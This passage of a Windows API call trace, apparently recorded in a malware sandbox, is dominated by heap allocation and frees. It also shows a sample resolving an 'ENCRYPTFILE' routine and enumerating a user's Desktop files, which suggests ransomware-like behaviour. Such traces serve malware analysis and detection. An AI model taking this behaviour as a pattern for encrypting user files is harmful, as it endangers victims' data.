lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.459] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.459] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.459] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.459] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.459] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.461] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.461] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.461] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0537ea0, ftCreationTime.dwHighDateTime=0x1d5ea99, ftLastAccessTime.dwLowDateTime=0x2b4da1f0, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0x2b4da1f0, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0x18e62, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="CgH9zawVTY35raopEyZt.mp3", cAlternateFileName="CGH9ZA~1.MP3")) returned 0x41ac040 [0122.461] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0122.462] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0122.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.462] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0122.463] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.465] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.467] HeapFree (in: hHeap=0x1780000, 